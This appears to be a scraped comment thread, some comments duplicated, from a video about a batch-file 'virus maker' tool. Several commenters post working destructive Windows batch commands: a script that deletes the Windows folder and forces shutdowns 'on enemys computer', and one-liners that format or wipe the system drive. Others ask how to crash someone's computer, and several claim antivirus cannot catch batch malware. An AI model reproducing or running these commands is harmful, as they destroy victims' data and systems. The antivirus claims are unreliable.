@MJL600000 By definition a virus is a program that copies itself to other files when executed. The effect of spreading through email is an optional feature of a virus's payload, and may more likely relate to the ability of a worm. Either way, I made this a long time ago, and I consider it as part of my history of learning.
i like your video can you send me your own attaker please or send me the waiting screan i mean start up screan in which you write bacth windows production and second a jakash3 video please send me that you made ownplzzzzzzzzz
So many people say things like "if it's a virus, my anti-virus will get it!" Truth is people, it wont, cause batch files are the computers original native com(DOS) files and it doesnt question them. Even if you were to scan a batch virus, you would come up with nothing, as its all just text that runs commands your computer is capable of doing on its own. So basically, nothing this program creates will come up in virus scans. In short, Jakash3 is a smart guy, with a lot of time on his hands.
@mysteryloser24 WRONG! depending on what code you use decides whether it's malware or not. I made a Trojan from batch which at one point disables the mouse and keyboard, and also opens a load of websites like youareanidiot(dot)org and stuff and when i try to save it: "ding ding ding THREAT HAS BEEN DETECTED"
@ATV642 Not wrong at all sunshine... Tell you what, you stick to making those little batch fails, I mean files, and i'll get back to managing a software company. How's that sound? Look, no matter what code a batch file contains, windows will run it. If it detects a threat, then you've got a pretty weird anti-virus that can't distinguish virus's from fails.
@mysteryloser24 O rly? then how come when i test it on a virtual machine, when i run it, it formats my C:/ Drive disables Mouse and Keyboard, and basically mucks up the pc?
@ATV642 Because a hard disk format isn't classed as malware. Neither is disabling hardware peripherals. It may be annoying for the user, but Windows does not class these things as the work of malware, unless it detects significant threat from the program. This, is no threat that is visible to windows, as they are ordinary tasks that Windows can already do manually.
@ATV642 Look, in short, the tasks your batch file carry out are not vicious acts of a malware program, they are simple Windows tasks, and they tend not to be questioned by an anti-virus, no matter which one it is. This conversation is over. Adios.
@kurtle005 I think this is a batch file (.bat) but theres a program called Bat2Exe which takes batch files and converts them to .exe files. Also it lets you add other files into the program, and allows you to give it copyright info and an icon too. Hope I helped :)
Towards the end of the prompts, there are 2 questions that ask for number input for a message box. Answering one of those questions with 'y' is an error.
The file itself just writes text to a file depending on the y/n answers you input to its prompts. So it's safe to use and it is not a virus. Just make sure you do not open the generated file it outputs to your desktop unless it is *.txt
killer virus @echo off title SUCKER!!!! del /f %windir% echo you got no windows AHAHAHA shutdown -f -s -t 45 -c "You have 45 seconds to save you files" ping localhost -n 2 >nul shutdown -f -s -t 10 -c "Changed my mind you have 10 seconds" shutdown -f -s -t 2 -c "TOO LATE" :loop echo HAHAHAHA goto loop save as bat and run on enemys computer HAHAHAHA
@Trojan99969 I realize your comment is 2 years old but.... oh well. Download the file in the link then extract. Right click it, select edit. this gives you the code, and you can figure out how to make your own based off of that.
These days anti virus programs are built in a way that cant be easily ended as there is more than 1 anti virus process running at a time each protect each other and re starting if the process is terminated.
An Anti virus doesnt delete batch unless its using certain malicious coding that will be recognized. Only this guy is using basic commands off of unix so in other words..No anti virus will stop it. And his lil fancy command window with the motion picture as if its loading is really fucking simple to make people.. He made it onces.. copied it multiple of times. and pinged it.. Think people. Come on now.
Lol I just called the NSA. They're on their way to arrest the maker of this video and all the people who commented on it. LOL I love I.P Trackers. Enjoy.
Just trust me! I didn't put anything in here that would harm your computer. Besides im sure if you had a good internet security it would remove harmful content from downloads.
Real virus or not, it's a great program. I just got finished making a real anti-virus...but the scan takes a while
minecraftftwno 3 days ago
i thinks its a awesome program. im a batch coder 2, although i dont really do viruses i do it sonetines. great vid
andysrosey 5 months ago
Please reply.If I send it to someone through an email,will the virus actiually send itself around from email to email?
MJL600000 7 months ago
@MJL600000 no
jakash3 7 months ago
@jakash3 Then its not really a proper virus
MJL600000 7 months ago
@MJL600000 By definition a virus is a program that copies itself to other files when executed. The effect of spreading through email is an optional feature of a virus's payload, and may more likely relate to the ability of a worm. Either way, I made this a long time ago, and I consider it as part of my history of learning.
jakash3 7 months ago
i like your video can you send me your own attaker please or send me the waiting screan i mean start up screan in which you write bacth windows production and second a jakash3 video please send me that you made ownplzzzzzzzzz
muhammadalishehzad 10 months ago
Looks Tiring xD Nice job man!
glitchmaster439 11 months ago
Good job Anon.
FlawlessNJ 1 year ago
Error probly is the fact TaskKill doesnt really owrk on vista and besdies its crap
epicwiseman 1 year ago
I could make something like this....
*gets evil ideas*....
;)
Bruceification73 1 year ago
So many people say things like "if it's a virus, my anti-virus will get it!" Truth is people, it wont, cause batch files are the computers original native com(DOS) files and it doesnt question them. Even if you were to scan a batch virus, you would come up with nothing, as its all just text that runs commands your computer is capable of doing on its own. So basically, nothing this program creates will come up in virus scans. In short, Jakash3 is a smart guy, with a lot of time on his hands.
mysteryloser24 1 year ago
@mysteryloser24 WRONG! depending on what code you use decides whether it's malware or not. I made a Trojan from batch which at one point disables the mouse and keyboard, and also opens a load of websites like youareanidiot(dot)org and stuff and when i try to save it: "ding ding ding THREAT HAS BEEN DETECTED"
ATV642 1 year ago
@ATV642 it also formats the C:/ Drive
ATV642 1 year ago
@ATV642 Not wrong at all sunshine... Tell you what, you stick to making those little batch fails, I mean files, and i'll get back to managing a software company. How's that sound? Look, no matter what code a batch file contains, windows will run it. If it detects a threat, then you've got a pretty weird anti-virus that can't distinguish virus's from fails.
mysteryloser24 1 year ago
@mysteryloser24 O rly? then how come when i test it on a virtual machine, when i run it, it formats my C:/ Drive disables Mouse and Keyboard, and basically mucks up the pc?
ATV642 1 year ago
@ATV642 Because a hard disk format isn't classed as malware. Neither is disabling hardware peripherals. It may be annoying for the user, but Windows does not class these things as the work of malware, unless it detects significant threat from the program. This, is no threat that is visible to windows, as they are ordinary tasks that Windows can already do manually.
mysteryloser24 1 year ago
@mysteryloser24 weird anti-virus? tell me what anti-virus you use.
ATV642 1 year ago
@ATV642 Look, in short, the tasks your batch file carry out are not vicious acts of a malware program, they are simple Windows tasks, and they tend not to be questioned by an anti-virus, no matter which one it is. This conversation is over. Adios.
mysteryloser24 1 year ago
is there a way to make virus bomb. like if I send the batch file to someone, I want to to open a lot of windows so that it crashes their computer???
newman1920 1 year ago
best small virus ever
@echo off
color a
color 1f
format %systemdrive%
simux250xxl 2 years ago
is this .exe or .bat? please reply to me
kurtle005 2 years ago
@kurtle005 I think this is a batch file (.bat) but theres a program called Bat2Exe which takes batch files and converts them to .exe files. Also it lets you add other files into the program, and allows you to give it copyright info and an icon too. Hope I helped :)
mysteryloser24 1 year ago
lol.....even windows defender will detect that virus....this is childplay.
xingatumatii 2 years ago
doesnt work for me. i get a error eventually
BaYoNeTWaRRioR 2 years ago
What kind of error?
jakash3 2 years ago
At some point when i press y it says its not a valid choice or something like that
BaYoNeTWaRRioR 2 years ago
Towards the end of the prompts, there are 2 questions that ask for number input for a message box. Answering one of those questions with 'y' is an error.
jakash3 2 years ago
Ok ill check that. I have been rushing the questions a bit. I'll pm you if i still have anymore problems
BaYoNeTWaRRioR 2 years ago
is the download link save to use or is it a virus
the programs i very cool
balarabieman 2 years ago
The file itself just writes text to a file depending on the y/n answers you input to its prompts. So it's safe to use and it is not a virus. Just make sure you do not open the generated file it outputs to your desktop unless it is *.txt
jakash3 2 years ago
wriet this c ommand del / f / c:
Zer0H4cker 2 years ago
Hi Jakash,I think it took you many days to make the Taskkiller,isnt it?Well its Pretty COOL!!!!
Fahmid0008 2 years ago
Double click that and you get one fucked up computer.
HACKandPRANK 2 years ago
what do i open .ext files with?
maam31 2 years ago
@maam31 lulz its txt dude, and its a text file. If you mean .exe files, they are just opened by windows on it's own.
mysteryloser24 1 year ago
del %systemdrive%\*.* /s /f /q
easiest way xD
S1K3CH1L4 3 years ago
Were Can I Download This Song........
Tell Me Please....
XxX13GBW 3 years ago
Nice music bro I like the KH1,2 Soundtrack aswell xD great vid
Sephiroth985 3 years ago
signofdevil666 3 years ago
primise if i downlaod this thing it wont be a virus
boogala321 3 years ago
how itz the name of song?
vladyboy667 3 years ago
how do you make a virus maker??
Trojan99969 3 years ago
its just a bunch of codes on notepad that when saved at .bat file will run those commands when the file is open
SVR09GlitchFree 2 years ago
@Trojan99969 I realize your comment is 2 years old but.... oh well. Download the file in the link then extract. Right click it, select edit. this gives you the code, and you can figure out how to make your own based off of that.
Bruceification73 1 year ago
send me the script please 5/5
Trojan99969 3 years ago
Sorry you couldn't download it in a while, I fixed the download link. You can download it in text form so save it as .bat
jakash3 3 years ago
can you give me the .txt ??
forthewiner 3 years ago
actually MasterMindzCreation you are wrong.
These days anti virus programs are built in a way that cant be easily ended as there is more than 1 anti virus process running at a time each protect each other and re starting if the process is terminated.
ParramattaSoldier 3 years ago
This is fucking shit all it does is end useless processes and delete shit that you can easily recover back.
And an anti virus will block it before it deletes anything or ends any process.
ParramattaSoldier 3 years ago
An Anti virus doesnt delete batch unless its using certain malicious coding that will be recognized. Only this guy is using basic commands off of unix so in other words..No anti virus will stop it. And his lil fancy command window with the motion picture as if its loading is really fucking simple to make people.. He made it onces.. copied it multiple of times. and pinged it.. Think people. Come on now.
MasterMindzCreation 3 years ago
@ParramattaSoldier it is a batch file, which means it uses cmd commands for deletion, etc. No virus scanner will block cmd commands. End of story.
Bruceification73 1 year ago
Lol I just called the NSA. They're on their way to arrest the maker of this video and all the people who commented on it. LOL I love I.P Trackers. Enjoy.
ariadarabi 3 years ago
Jakash3 Is a pro.. all things that he do are awnsome , his a genius :D
nanassim 3 years ago
Hey how can i tell what im downloading dosent have these viruses your showing us
TheGoldenDuke 3 years ago
Just trust me! I didn't put anything in here that would harm your computer. Besides im sure if you had a good internet security it would remove harmful content from downloads.
jakash3 3 years ago
but it lloks like your a mastermind you probly could get passed all my shit... but i guess ill trust you
TheGoldenDuke 3 years ago
WOW!! i m impressed!! that thing is very cool...thank you!
amieow98 3 years ago
Wow so many prompts. That must've took a while...
Branflakes91093 3 years ago
Awesome, Good Job =)
596319adrianserrano 3 years ago